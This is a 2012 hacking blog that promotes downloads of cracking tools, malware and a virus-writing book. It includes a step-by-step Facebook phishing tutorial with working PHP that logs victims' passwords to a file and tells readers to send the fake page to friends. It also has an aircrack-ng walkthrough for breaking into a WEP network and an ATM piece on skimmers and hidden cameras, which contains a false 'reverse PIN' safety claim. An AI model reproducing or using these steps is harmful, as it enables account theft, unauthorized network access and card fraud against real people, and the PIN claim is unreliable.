Wednesday, November 28, 2012

Hackers Beware Free Hacking e-Book | The ultimate Guide to the Internet Security














As per various hacking books are available to hacking but here is the best book for the hackers that to be free downloadable.
Hackers Beware starts with a road map of the various areas of hacking but quickly delves into the details of how specific attacks work and how to protect against them. Since most attacks we hear about either occur or are perceived to come from hackers, people are very interested "in how they do that" - the techniques hackers use to break into systems. Hackers Bewareis unique in that it gives specific exploits, exactly how they work and how to protect against them. This book will help readers understand what security threats they are up against and what they need to do to protect against them. Some books cover this from a high level but do not get into the details of specific exploits and cover it in a case by case fashion. This book will cover the complete picture. It will not only describe how an exploit works but present the signature of the attack, what to look for on a network and how to protect against it.So here i am giving the free downloadable link to the HACKERS BEWARE the HACKING E-BOOK to you guys.






Computer Viruses For Dummies Hacking E-Book Free Download



book in computer field. Using this book you can create your own virus. This book will teach you about the virus programming.

For the Beginner level this book help you to make clear of the doubts in viruses in computer world. You can enjoy by reading this book. you can download this book.

Sunday, November 25, 2012

Download Free All Softwares Needed For Hacking And Cracking














- Anon FTP
- Arpinject
- Aspack21
- Atk-2.1
- Bios Pas Remover
- BlasterW32
- Blue
- BMP Ripper
- Brutus
- CASXM138
- CAYZODQF
- CGI Founder v1.043
- CGI Sscan
- Cia10
- Cragle
- Crack Zip
- Davs TR Retail
- Deep Un Freeze
- Dr VBS
- EES Binder
- FTP BR
- Genexe
- Grinder 1.1
- Hack Flash Tempelate
- Hack My Space
- Hack Photoshop CS2
- Hackers Assistant
- Hack the game
- H C K
- HL Boom
- Hotmail Scam Page
- Hydra
- John
- Key Logger
- Legion NetmBios Scanner
- Mail Bomb_2.0 YAHOO
- MIDNITE massacren
- NFO Maker
- Nimda
- Nkedb
- NT Packer
- NTS
- Null Ass Frontend
- P0kes WormGen
- Panther
- Pkp BB pass extractor
- phpBBAttacker
- Pqwak2
- Proxy Pro
- Rainbow crack
- Res Hacker
- Rocket
- RPC
- Rpc scan
- Sasser
- Send Mailer
- Show Pass
- Site Digger
- Smbat- win32bin
- SMB Die
- SMB Proxy
- Sprut
- Stealth- HTTP Scanner
- Super
- TFTPD32
- T Hunter
- Tina soft KILL
- UPD Flood
- Ultra Dos
- Visa Spam
- X Pass
- Yahoo Password
- Zehir
- Addr View
- AOL View
- App To Service
- Astaroth Joiner
- Bank Of America
- Cable Modem Sniffer
- Cap Keys DIGITAL
- C Ports
- C C Generator
- DDL Sites
- eBay
- E Gold.
- E-mail Cracker
- Database Defacer
- F.B.I. Binder
- FTP Brute Forcer
- Fuck Mail Bomber
- PhpBB_exploit_pack
- Google Hacker
- Hook Tool Box
- Hotmail Email Hacker
- Hotmail Hack
- HSBC-US
- Iecv
- IP2
- Ip Net Info
- Key Chenger
- Moore R. Port Scanner
- Msn Flooder
- Msn Account Cracker
- Msn Loader
- NET BIOS Scaner
- Net bios name scanner
- Net Res View
- NO limit cracker
- On-Off MSN
- OS Update Hack
- Pay Pal
- PC Any Pass
- Php Nuke Hacker
- phpBB Annihilator
- phpbb bruteforcer.
- phpBB_DoS
- phpBB_spammer
- phpBBAttacker
- phpBBcracker
- php Bug Scan
- PHP Fucker
- PhpNuke_ bypass
- Ping & Nukes
- Port Listener
- procexp
- Pro Mo
- phpBB Email harvester
- Remote Shut Down
- Server 2003 Keygen
- Server Killer
- Source Checker
- Source codes
- SQL Scan
- Super Scan
- Traceroute
- UC.Forum Spam
- USBank
- Win XP Activator
- Win XP Corperate Keygen
- Who is td
- Warez Sites
- Win Admin pass Hack
- Yahoo Ultra Cracker
- Web Cracker
- Win Xp Key Changer
- Win XP Key Viewer
- XP lizer
- Window Hide
- www Hack
- Win XP KeyGen.


Facebook Phishing Tutorial











Hi every one this post is updated now. The previous one is not clearly explained so i updated with this with the clear method so you can learn the basic of hacking and how this works. Hacking the facebook account password is not that much tough. I will tell you how you can hack but learn this only for educational purpose...







What is Phishing?
Phishing is the technique to get the victims password without Victims knowledge by showing the duplicate log in page.This is the method which used by most of the peoples in earlier time and even now. Actually the process is getting the victims password using the Fake Login page called phisher.

Phishing Process:
Actually hacker need to create the fake login page to get the password of victim. In the Normal Webpage which having the login form. will look like this.




The Duplicate or fake page also look like this only . yea that is the thing we have to make a same page. You can ask what the changes we need to do? Actually we work with the HTML part only the backside of webpage.

If you know the Small knowledge of the HTML means this will be easy one. Any how don't worry i will guide you to make a fake login page of facebook.

Making the Phishing Or Fake page:
Finally we are going to Attack.Here are the simple steps will guide you to make fake page just follow the steps.

Just Go here https://www.facebook.com/login.php and right click on anywhere in the webpage and select View Page Source.
Copy all the codes in the page and paste it on note pad or Note pad ++(recommended) and save it like "Index.Html".
Copy the below Php code and paste it on another note pad. and name it "Fb.php".

<?php
header(”Location: http://www.Facebook.com/login.php “);
$handle = fopen(”pass.txt”, “a”);
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>

And Create a empty new note pad and save it "pass.txt".
Now you having the Three files

Index.html
Fb.php
Pass.txt
Now we are at the working part, Right click on the Index.html file and open it using note pad or note pad ++. Now press The CTRL + F to perform the search operation. Search the Keyword called action=' also you see "method=post" change it into "method=get".
The keyword followed by the URL look like this.

action="www.facebook.com/login.php"

Now you need to change the URL of existing one. Just replace the existing URL with "fb.php" Which we created earlier.This will look like this after the changes.

action="fb.php"
Thats it you are done half of the part. Now you need any free web hosting accounts to upload these files I refer my3gp.com,110mb or any free hosting account which you trusted and also not banned for a long time. if you prefer the paid hosting means that is more than good.
Sign up into my3gb.com and Select the file manger and upload these three files to same directory else this won't work.
Copy the Html file link(Index.html) which uploaded and send it to you friends and tell to sign in and see the magic ( Actually you need to show some social engineering there).
then check the empty text file to get the password.
That's it you are done.

Saturday, November 3, 2012

Hack a wi-fi network














1) First we need to scan for available wireless networks.
Theres this great tool for windows to do this.. called “NetStumbler” or Kismet for Windows and Linux and KisMac for Mac


It’ll also show how the Wi-fi network is secured..
The two most common encryption types are:
1. WEP

2. WAP
WEP i.e Wire Equivalent Privacy is not consideres as safe as WAP i.e Wireless Application Protocol.
WEP have many flaws that allows a hacker to crack a WEP key easily.. whereas

WAP is currently the most secure and best option to secure a wi-fi network..
It can’t be easily cracked as WEP because the only way to retreive a WAP key is to use a brute-force attack or dictionary atack.

Here I’ll tell you how to Crack WEP
To crack WEP we will be using Live Linux distribution called BackTrack to crack WEP.
BackTrack have lots of preinstalled softwares for this very purpose..
The tools we will be using on Backtrack are:
Kismet – a wireless network detector
airodump – captures packets from a wireless router
aireplay – forges ARP requests
aircrack – decrypts the WEP keys

1. First of all we have to find a wireless access point along with its bssid, essid and channel number. To do this we will run kismet by opening up the terminal and typing in kismet. It may ask you for the appropriate adapter which in my case is ath0. You can see your device’s name by typing in the command iwconfig.

2. To be able to do some of the later things, your wireless adapter must be put into monitor mode. Kismet automatically does this and as long as you keep it open, your wireless adapter will stay in monitor mode.


3. In kismet you will see the flags Y/N/0. Each one stands for a different type of encryption. In our case we will be looking for access points with the WEP encryption. Y=WEP N=OPEN 0=OTHER(usually WAP).


4. Once you find an access point, open a text document and paste in the networks broadcast name (essid), its mac address (bssid) and its channel number. To get the above information, use the arrow keys to select an access point and hit <ENTER> to get more information about it.

5. The next step is to start collecting data from the access point with airodump. Open up a new terminal and start airodump by typing in the command:
airodump-ng -c [channel#] -w [filename] –bssid [bssid] [device]
In the above command airodump-ng starts the program, the channel of your access point goes after -c , the file you wish to output the data goes after -w , and the MAC address of the access point goes after –bssid. The command ends with the device name. Make sure to leave out the brackets.

6. Leave the above running and open another terminal. Next we will generate some fake packets to the target access point so that the speed of the data output will increase. Put in the following command:
aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:55:66 -e [essid] [device]
In the above command we are using the airplay-ng program. The -1 tells the program the specific attack we wish to use which in this case is fake authentication with the access point. The 0 cites the delay between attacks, -a is the MAC address of the target access point, -h is your wireless adapters MAC address, -e is the name (essid) of the target access point, and the command ends with the your wireless adapters device name.

7. Now, we will force the target access point to send out a huge amount of packets that we will be able to take advantage of by using them to attempt to crack the WEP key. Once the following command is executed, check your airodump-ng terminal and you should see the ARP packet count to start to increase. The command is:
aireplay-ng -3 -b [bssid] -h 00:11:22:33:44:5:66 [device]
In this command, the -3 tells the program the specific type of attack which in this case is packet injection, -b is the MAC address of the target access point, -h is your wireless adapters MAC address, and the wireless adapter device name goes at the end.

8. Once you have collected around 50k-500k packets, you may begin the attempt to break the WEP key. The command to begin the cracking process is:
aircrack-ng -a 1 -b [bssid] -n 128 [filename].ivs
In this command the -a 1 forces the program into the WEP attack mode, the -b is the targets MAC address, and the -n 128 tells the program the WEP key length. If you don’t know the -n , then leave it out. This should crack the WEP key within seconds. The more packets you capture, the bigger chance you have of cracking the WEP key.


Top 3 Ways to Hack ATM | Protection Against ATM Hacking


















ATM hacking is from past is the first interest of every computer hacker.And in this article i will talk about ATM Hacking, things like how ATM Works , What are the vulnerabilities available to exploit and last but not least YES, how to patch them. So starting from the first how ATM works.

Warning:- Hacking ATM is highly illegal. Can Put you into cell for minimum 3 years along with fine 7 lac.This article is just for education purpose only do respect the law in your country, the author of the tutorial do not held any responsibility of the act or trails performed by you after reading the article.

How ATM Works
An ATM is simply a data terminal with two input and four output devices. Like any other data terminal, the ATM has to connect to, and communicate through, a host processor. The host processor is analogous to an nternet Service Provider (ISP) in that it is the gateway through which all the various ATM networks become available to the cardholder (the person wanting the cash).

Most host processors can support either leased-line or dial-up machines. Leased-line machines connect directly to the host processor through a four-wire, point-to-point, dedicated telephone line. Dial-up ATMs connect to the host processor through a normal phone line using a modem and a toll-free number, or through an Internet service provider using a local access number dialed by modem.
Leased-line ATMs are preferred for very high-volume locations because of their thru-put capability, and dial-up ATMs are preferred for retail merchant locations where cost is a greater factor than thru-put. The initial cost for a dial-up machine is less than half that for a leased-line machine. The monthly operating costs for dial-up are only a fraction of the costs for leased-line.
The host processor may be owned by a bank or financial institution, or it may be owned by an independent service provider. Bank-owned processors normally support only bank-owned machines, whereas the independent processors support merchant-owned machines.



Warning:- Hacking ATM is highly illegal. Can Put you into cell for minimum 3 years along with fine 7 lac.This article is just for education purpose only do respect the law in your country, the author of the tutorial do not held any responsibility of the act or trails performed by you after reading the article.
Methods of Hacking ATM



1. Magnetic Reader
Most ATM hackers have a device called Magnetic Reader which they attach over the card slot on the ATM, and as any one pin the card inside automatically it reads the magnetic information. And with the advancement of time the with the help of wireless technology, the magnetic reader automatically transmitted the details to fraudsters in a nearby location.

2. Hidden Camera
Obviously this is one of the easy method to hack an ATM machine but this is something more than hack, here we are not penetrating the ATM. As we all know our ATM is protected by a PIN which acts as our password so if some one have to get money after stealing our card he/she should have the PIN code too, these days criminals have a solution for this too.

3. They enter into the ATM when guard is outside put hand on the ATM cam and silently in 5 or 6 seconds, just install a hidden camera near by the keypad of the ATM from the user enter his/her PIN CODE, and again using the latest technology (wireless) and the PIN is digitally recorded and now hacker have the choice whether he want to get the details remotly or he/she will go to ATM and get the details by himself/herself.

Protection Against ATM Hacking
1. Do Hide the keypad when you enter your PIN CODE.

2. See All around if found any camera which you think not supposed to be there do inform the ATM guard and the near by Bank.

3. DO confirm completeness of the transaction after getting the money most people get trapped into this as the said above in second method.

4. If any criminal caught to and say to extract money from ATM, to save your money just reverse your PIN Account number. Like if my PIN CODE is 1234, if some one having PIN Code like 7777 then just put a 0 (Zero) in the last digit, money will stuck half in the ATM and half outside.
Hope you like the article :)

Warning:- This article is just for education purpose only do respect the law in your country, the author of the tutorial do not held any responsibility of the act or trails performed by you after reading the article.